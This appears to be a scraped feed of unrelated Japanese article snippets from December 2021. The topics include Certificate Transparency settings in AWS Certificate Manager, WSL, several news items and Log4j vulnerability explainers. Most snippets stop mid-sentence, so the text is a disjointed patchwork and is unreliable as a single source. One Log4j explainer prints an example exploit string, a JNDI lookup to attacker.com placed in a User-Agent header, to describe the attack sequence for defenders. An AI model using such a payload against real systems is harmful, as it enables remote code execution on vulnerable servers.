知られたくないドメインのSSL/TLS証明書を取得する場合は証明書の透明性(CT)を無効にしよう(AWS Certificate Manager編) SSL/TLS証明書(以下証明書)には証明書の監視や監査を行って証明書の信頼性を高める「Certificate Transparency(証明書の透明性;以下CT)」という仕組みがあります。 Certificate Transparency : Certificate Transparency CAが証明書を発行する際には、パブリックなCTログサーバーに発行履歴を登録し、ログサーバーから受け取った署名付きのタイムスタンプ(SCT;Signed Certificate Timestamp)を埋め込んだ証明書を発行します(埋め込まない方法も有り)。 ブラウザは証明書に埋め込まれたSCTを確認し、存在しなければ証明書を不正とみなします(ブラウザによ

誰か利用してくれんか？ https://occhan-nel.com/ スレは自由に立てられる仕様。 おっちゃん同士でちいかわやホロライブなど色々語れたら嬉しい。 【動機】 私も中高年男性なのだが、ガルちゃんみたいな感じで、 おっちゃん同士でゆるく色々語れる匿名掲示板があれば良いなと唐突に思った。 5ch（2ch）は15年近く見続けているが、おっちゃんに限定しているわけではない。爆サイは空気感があまり合わなかった。 他にも掲示板サービスは数多くあるだろうけど、おっちゃん同士のゆるいコミュニティサービスを自分で制作してみたいと思った。 そんな感じでプログラマーの方やイラストレーターの方に協力してもらってコツコツ作った。 「30万円くらいで作れるかな～」と思っていたら結果的に総額で70万円くらい掛かった。 そして1ヵ月前くらいに公開したが、まあ当然のごとく誰も利用していない（全く宣伝も集客もし

この記事は LITALICO Engineers Advent Calendar 2021 その2 の14日目の記事です。 社内slackでMacの民が環境などでハマっているのを見ると、「（WSLはいいぞ...）」と心の中で思ったり冗談半分で言ったりするのですが、なんだかんだで良さをちゃんと列挙したことないなと気付きました。 今後もし本気で布教する機会が来たときに自信を持って推せるよう、ちょいとここらで想いを書き出してみようと思います。 布教ターゲット 本記事の想定読者、もとい布教ターゲットは、 ソフトウェア開発、特にWeb系の開発をする人 特に強い理由がなくMacを使っている人 宗教上の理由でMacを使わずLinuxを使っているが、ぶっちゃけつらい人 フルスペックなゲームプレイと開発を一つのマシンで欲張りたい人 となっています。信念を持ってMacを使っている方やLinuxデスクトップをガ

建設業の受注実態を表す国の基幹統計の調査で、国土交通省が建設業者から提出された受注実績のデータを無断で書き換えていたことがわかった。回収を担う都道府県に書き換えさせるなどし、公表した統計には同じ業者の受注実績を「二重計上」したものが含まれていた。建設業の受注状況が8年前から実態より過大になっており、統計法違反に当たる恐れがある。 この統計は「建設工事受注動態統計」で、建設業者が公的機関や民間から受注した工事実績を集計したもの。2020年度は総額79兆5988億円。国内総生産（GDP）の算出に使われ、国交省の担当者は「理論上、上ぶれしていた可能性がある」としている。さらに、月例経済報告や中小企業支援などの基礎資料にもなっている。調査は、全国の業者から約1万2千社を抽出し、受注実績の報告を国交省が毎月受けて集計、公表する。 国交省によると、書き換えていたのは、業者が受注実績を毎月記し、提出する

OPPOが12月14日、オンラインイベント「INNO DAY 2021」でスマートグラス「OPPO Air Glass」を発表した。 OPPO Air Glassは、OPPOのスマートフォンやスマートウォッチと連携して、さまざまな情報を取得できる単眼のスマートグラス。同社はAir Glassで先進的な“aR体験”ができるとアピールする。「aR」は「assisted Reality」を意味し、日常生活をサポートすることを目的としている。2022年第1四半期に中国で発売する予定で、日本での発売は未定。

声優でナレーターの八奈見乗児（やなみ・じょうじ）さんが3日午後10時59分に死去した。90歳。14日に所属事務所・青二プロダクションが公式サイトを通じて訃報を伝えた。 サイトでは「弊社所属俳優　八奈見乗児 儀（享年91）令和3年12月3日 午後10時59分に90歳を以て永眠いたしました」と報告。「尚　葬儀告別式につきましては親族のみにて滞りなく相済ませました。ここに生前の御厚誼に深謝するとともに謹んでご通知申し上げます」と記した。

現地時間の2021年12月10日、アメリカ中部を襲ったトルネードにより、イリノイ州のエドワーズビルにあるAmazon倉庫が崩壊しました。Amazonのすべての倉庫では従業員が倉庫内に携帯電話を持ち込むことが禁止されているのですが、今回のような緊急事態発生時への対処に難があるとして、ルールに対する不満の声がAmazon社内から噴出しています。 Deadly Collapse at Amazon Warehouse Puts Spotlight on Phone Ban - Bloomberg https://www.bloomberg.com/news/articles/2021-12-12/deadly-collapse-at-amazon-warehouse-puts-spotlight-on-phone-ban Amazon Workers Say Warehouses Lack Sa

自殺や不登校につながる深刻ないじめが相次ぐ中、生徒や保護者への調査で「加害者を出席停止にすべきだ」という回答が5割を超えました。調査を行った専門家は「被害者と加害者双方の学ぶ権利を守りつつ、安心して学べる場が必要だ」と指摘しています。 調査は名古屋大学大学院の内田良准教授のグループが、ことし8月に小中学校の教員と保護者、中学生それぞれ400人、合わせて2000人にインターネット上で行いました。 調査では、いじめへの対応について、加害者を「出席停止」にすべきかたずねたところ、「とても思う」もしくは「どちらかと言えば思う」という回答が、 ▽中学生で53％ ▽小学校と中学校の保護者で、ともに60％を超えました。 教員では、 ▽小学校で34％ ▽中学校で46％となりました。 また、いじめを「警察と連携して解決すべき」という回答は、 ▽中学校の教員が最も多く73％ ▽中学生の保護者や生徒でも60％を

共産党の志位和夫委員長は１３日、来年２月に開幕する北京冬季五輪の外交的ボイコットを日本政府に求める声明を発表した。「大会の開会・閉会式に政府代表を派遣することは、中国での人権抑圧の黙認となりかねない。日本政府は、当然、政府代表を送るべきではない」と強調。「従来の及び腰の態度をあらため、国際法にもとづく冷静な外交的批判によって、人権侵害の是正とオリンピック憲章の順守を正面から求めるべきである」とも訴えた。 声明では「五輪を開催する以上、自ら賛成してきた国際的な人権保障の取り決め、および五輪憲章を順守し、人権侵害の是正の措置をとることを厳しく求める」と中国政府を批判。国際オリンピック委員会（ＩＯＣ）に対しては「中国女子テニス選手の問題で、実際上、中国を擁護し、真相の隠蔽に加担するのに等しい行動をとっていることは重大である」と指摘し、是正を働きかけるよう注文をつけた。

ホーム ニュース Steam版『ウィザードリィ外伝 五つの試練』ついに12月17日早期アクセス配信開始へ。ただしエディタの同時提供は見送り イードは12月12日、3D ダンジョンRPG『ウィザードリィ外伝 五つの試練』の早期アクセス配信を12月17日に開始すると発表した。同社が運営するゲームメディアGame*Sparkのブランドより、PC（Steam）向けにリリースされる。価格は2980円。なお、Steamウィンターセール終了日（現地時間1月5日）までは10％オフで購入可能だ。 本作はタイトル発表当初、6月18日より早期アクセス配信を開始する予定だったが、配信開始前日に急遽延期となっていた。この度、あらためて配信日が告知されたかたちとなる。ただし別アプリケーションとして同梱予定だったエディタについては、同時提供が見送られるとのこと。提供形態の変更と再開発をおこなうとし、2022年内のリリー

JNDI とはJava Naming and Directory Interface という、Java アプリケーションが DNS や LDAP 等のサービスを利用するための汎用的なインタフェース (ライブラリ) です。 Log4j と JNDI lookupApache Software Foundation が開発した、Java ベースのロギングに関するライブラリです。JNDI lookup という機能があり、書き込んだログの一部を自動で変数化します。今回はこの機能が悪用されています。 CVE-2021-44228 の攻撃シーケンスの例 攻撃者は脆弱性をトリガーするために http ヘッダの User-Agent に ${jndi:ldap://attacker.com/a} という文字列を埋め込み、http リクエストを送信します。脆弱性のあるサーバの Java App はその通信を

2021年12月10日、Javaベースのログ出力ライブラリ「Apache Log4j」の2.x系バージョン（以降はLog4j2と記載）で確認された深刻な脆弱性を修正したバージョンが公開されました。セキュリティ関係組織では過去話題になったHeartbleedやShellshockと同レベルの脆弱性とも評価しています。ここでは関連する情報をまとめます。 １．何が起きたの？ Javaベースのログ出力ライブラリLog4j2で深刻な脆弱性（CVE-2021-44228）を修正したバージョンが公開された。その後も修正が不完全であったことなどを理由に2件の脆弱性が修正された。 広く利用されているライブラリであるため影響を受ける対象が多く存在するとみられ、攻撃が容易であることから2014年のHeartbleed、Shellshock以来の危険性があるとみる向きもあり、The Apache Software

タレントのつるの剛士が１２日、フジテレビ系「ワイドナショー」に出演し、東京五輪での人権問題に声を上げた人々が、北京五輪の人権問題について無言であることに「違和感がある」と疑問を投げかけた。 北京五輪の外交的ボイコット問題で、日本があいまいな態度を示しているという話題。国際政治学者の三浦瑠麗氏は、外交的ボイコットは「アメリカ国内政治の話」と分析。日本の対応として「『今の中国は積極的に仲良くしたい国じゃない』ので、超軽量級のスポーツ・国際親善に限定した大臣を送ればいい」と提案した。 ダウンタウンの松本人志は「いずれにせよ早く動けよ」と姿勢がはっきりしないことにいらだちを見せた。つるのも「何も自分（日本）の意見も言わず『ボイコットを検討って』一番中途半端。風見鶏がフニャフニャ」と松本に同意した。 続けて「あんだけ『オリンピック反対』って言ってた人たちが、今回のこれ（中国の人権問題）に関してまった

Webセキュリティ製品などを手掛ける米LunaSecの報告によると、Minecraftの他、ゲームプラットフォームのSteamやAppleの「iCloud」もこの脆弱性を持つことが分かっており、影響は広範囲に及ぶと考えられるという。 この脆弱性の影響があるのは、Log4jのバージョン2.0から2.14.1までと当初みられていたが、Log4jのGitHub上の議論では、1.x系も同様の脆弱性を抱えていることが報告されている。対策には、修正済みのバージョンである2.15.0-rc2へのアップデートが推奨されている。 セキュリティニュースサイト「Cyber Kendra」によれば、この脆弱性に対して付与されるCVE番号は「CVE-2021-44228」という。 脆弱性の報告を受け、Twitter上ではITエンジニアたちが続々反応。「やばすぎる」「思っていたよりずっとひどいバグだった」「なぜこんな

Rivian offers (up to) $5,000 discount if you trade in your gas-powered truck

このブログはグロースエクスパートナーズ Advent Calendar 2021の10日目です。 社内メンバーから要望があったので、僕自身がどのようにシステム開発の初期段階において、どのように要望を整理し、形にしていっているのかについて書きたいと思います。 なお内容は弊グループの案件を前提にしているので、システム開発は以下のような状況が一般的です。 クライアントは直接契約（プライム） 要望を出すのはクライアント企業内で事業運営側の人で、システム開発にかかわった経験がないことがある 対象システムはSoE/mode2で、一般消費者や取引先などの外部ユーザーと、社内で業務を回す内部ユーザーがいる 相手の話を整理するフレーム まず、相手から得られる情報を4つの階層にわけて整理する必要があります。 目的：達成すべきこと 戦略：目的を確実・効率的に達成するためのシナリオ 戦術：戦略を実行するための具体

なぜエンジニアが作る画面はダサいのか…?「理由」と「対策」を徹底解説【エンジニア向け画面デザイン講座】UXUIDesignUIデザイン画面設計 1.はじめに エンジニアの私がデザインを本気で勉強した結果、デザイナーとエンジニアはそもそも思考が大きく違っているということがわかりました。 今回は「それ」をデザインに苦手意識のあるエンジニア方にも理解してもらえたらと思い、わかりやすくまとめてみました。 2.アプリの画面デザインを考えてみよう まず、こんなアプリを考えてみてください。 フィットネストレーナーが使うアプリ トレーニングルームでお客様とお話しながら使う 端末はタブレット そして 会員の個人情報確認 前回までのトレーニング状況の確認 次回の予約受付 といったことをします。 使える情報としては、こんな感じです。 あなたならどう画面デザインをするか、もしお時間があったら考えてみてください。

ググり力、それはエンジニアにとっては 必須の能力 になりつつあると思います。 さて、皆さんは自分のググり力で欲しい情報にちゃんとたどり着けると言えますか？ @Yametaro さんからのお題です。 ある日、コードレビュー中ワイ ワイ「さぁ、今日も同僚のコードをレビューしていくでぇ」 ワイ「まずは新卒のT君のコードを読んでいこか」 ワイ「どれどれ…」 ワイ「ん？なんやこの??っていう書き方は…？」 ワイ「ググってみよか…」 ワイ「JavaScript ??と入力して、検索ボタンをポチッとな」 ワイ「…あれ？それらしい検索結果が出てこんな…」 ワイ「ぐぬぬ、記号関係はググりづらいこともあるんやな…」 ワイ「これじゃあ今日はもう、酒飲んで寝るしかないやないか…」 〜飲酒、そして就寝へ…〜 では JavaScript で ?? の検索方法はどうしたらいいのか？ ここに１つの解答を示しておきます！

さ @sachiko_KuKaKo mathematics/U+U+U+(-E8)+(-E8)/lattice-polarized K3 surface/mixed hypersurface singularity さ @sachiko_KuKaKo 先日、某所で、「数学(もっと広く自然科学)の事実は人間がいなかったときから存在するし、人間が死滅しても残る」と言ったら、 文系の人たちに、「人間が存在してこそ認識できる」と反論された。 2021-12-07 20:15:44 さ @sachiko_KuKaKo で、例えば、わかりやすい例として、元素の周期表とか、人間が死滅しても、別の知的生物が発見すれば、 同等の結果が得られると思うし、 発見されなかったとしても、 存在し続けるとわたしは思うのですが、 どうなんでしょう？ 2021-12-07 20:19:02